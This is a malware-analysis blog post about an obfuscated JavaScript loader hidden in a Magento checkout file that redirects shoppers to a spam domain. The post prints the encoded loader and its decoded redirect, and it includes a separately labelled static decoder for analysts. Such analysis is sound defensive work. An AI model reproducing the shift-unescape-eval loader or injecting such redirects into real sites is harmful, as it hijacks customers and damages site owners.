Malicious Redirect Injected in Magento One Page Checkout

November 23, 2016 | Bruno Zanelato


With the holiday season around the corner, ecommerce sites are very valuable to website owners and equally attractive to attackers. Hackers have been targeting Magento installations to steal sensitive information such as credit card data or PayPal logins; in this case, however, the goal was to promote websites for monetary gain. Being PCI compliant is becoming increasingly critical as attacks on ecommerce sites continue to evolve.

After the consumer has made the decision to purchase, the checkout process becomes one of the most important steps for any business. The user experience during this process sets the tone for the entire interaction and usually leads to a successful sale. When the visitor’s experience is disrupted, both the sale and their trust are often lost.

Checkout Page Redirect

During our malware investigation process, we found an interesting piece of code that redirected users to an external page not intended by the website owner during the checkout process.

The browsing and shopping experience remained unmodified until the consumer began to check out. After selecting the products and clicking “Proceed to checkout” the user was redirected to hxxp://bestdealsweek[.]com – instead of the payment page.

We took a look at the code to understand what was responsible for this redirect. Inside /js/varien/accordion.js we located the malicious code.

Here is the content (obfuscated):

var x="\'%kVg\'%YZaVn\'%(9\'%&%%(7%6\'%\'%hZiI^bZdji\'-\'\'YdXjbZci#adXVi^dc#]gZ[(9\',]iie(6$$WZhiYZVahlZZ`#Xdb\',\'\'\'8\'%YZaVn\'.(7",y="",w="",z;
z=x['length'];
// Shift every character code up by 11, unescape the resulting %XX sequences, then eval the result
for(i=0;i<z;i++){y+=String['fromCharCode'](x['charCodeAt'](i)+11) }
w=this['unescape'](y);this['eval'](w);

JavaScript Layer Creation

This particular file, coupled with /skin/frontend/base/default/js/opcheckout.js, creates a JavaScript Layer responsible for:

  1. Submitting step data to the checkout controller
  2. Interpreting controller responses to update the content of the checkout steps.

This layer allows the checkout process to be completed without the browser needing to load every request in a new page.

Here’s how the accordion.js was injected into the One Page checkout:

<script type="text/javascript" src="hxxps://domain/js/varien/accordion.js"></script>

After decoding it, we can see the redirect that happens within the user’s open tab:

var delay = 100;
setTimeout("document.location.href='hxxp://bestdealsweek.com'",delay);
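The loader above decodes its payload by shifting each character code, unescaping and then calling eval. The following added example (written for this article, not code from the post or from Magento) reproduces the decoding steps statically and returns the result instead of evaluating it, so an analyst can read the payload and extract any redirect target without executing it. The sample string, the hostname redirect.example and the helper names are constructed for the demonstration; the shift value 11 is the one used by the loader on the page.

```javascript
// Added example: static decoder for the "shift char codes, unescape, eval" loader.
// Nothing here executes the decoded payload.

// Decode: add `shift` to each UTF-16 code unit, then unescape %XX sequences.
// The loader in accordion.js uses shift = 11.
function decodeShiftedPayload(encoded, shift = 11) {
  let shifted = "";
  for (let i = 0; i < encoded.length; i++) {
    shifted += String.fromCharCode(encoded.charCodeAt(i) + shift);
  }
  // unescape() is exactly what the loader calls; it only turns %XX / %uXXXX back into characters.
  return unescape(shifted);
}

// Pull redirect targets out of decoded JavaScript: assignments of a string literal to
// document.location.href, window.location, location.href, or location.
function findRedirectTargets(decodedJs) {
  const re = /(?:document\.|window\.)?location(?:\.href)?\s*=\s*(['"])([^'"]+)\1/g;
  const targets = [];
  let m;
  while ((m = re.exec(decodedJs)) !== null) targets.push(m[2]);
  return targets;
}

// Inverse transform, used here only to build the constructed sample below.
function buildSample(plainJs, shift = 11) {
  const escaped = escape(plainJs);
  let out = "";
  for (let i = 0; i < escaped.length; i++) {
    out += String.fromCharCode(escaped.charCodeAt(i) - shift);
  }
  return out;
}

// Constructed sample: the same shape as the payload the post shows after decoding,
// with a placeholder hostname in place of the real redirect domain.
const SAMPLE_PLAIN =
  "var delay = 100;setTimeout(\"document.location.href='http://redirect.example'\",delay);";
const SAMPLE_ENCODED = buildSample(SAMPLE_PLAIN);

const decoded = decodeShiftedPayload(SAMPLE_ENCODED);
console.log("decoded payload:", decoded);
console.log("redirect targets:", findRedirectTargets(decoded));
```

Because the decoder never calls eval, it is safe to run on a captured sample; the extracted target can then be fed straight into a blocklist or a WAF rule, and the same `findRedirectTargets` check can be run over any decoded JavaScript found in the docroot.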

This is one of the many injection techniques attackers have been using against Magento ecommerce sites to profit from vulnerable installations. To reduce the risk of such injections, we recommend keeping all software updated (themes, plugins, core files) and using a Website Application Firewall.

Employing an Integrity Monitoring system to detect file modifications and creating a regular backup strategy will also benefit you in the case of a compromise.

Update: We have just released a Magento security guide. Check it out!


Categories: Ecommerce Security, Magento Security. Tags: Hacked Websites, Redirects

About Bruno Zanelato

Bruno Zanelato is Sucuri's Copywriter, who joined the company in 2014. As an Engineer - System III working on the SOC team since 2019, his main responsibilities cover firewalls, IDS, IPS, HIDS, WAF, log management, system hardening, PCI compliance, IDS/IPS signatures and Linux/BSD hardening, as well as developing content to highlight Sucuri's products and services and to educate the public about website security. Bruno's professional experience covers more than 15 years of deploying and managing Web Application Firewalls as well as open-source security software. When Bruno isn't drafting blog posts or writing web pages, you might find him online playing MMORPG games, watching MMA, and having fun with his kids and family during his free time. Connect with him on LinkedIn.

Comments

  1. Sean Owens

    November 24, 2016

    That’s why as a site owner you need to make sure where your “addons” are coming from, as a site developer you must examine the code of every addon you install carefully. Free addons should be avoided, and even paid ones should be checked rigorously.
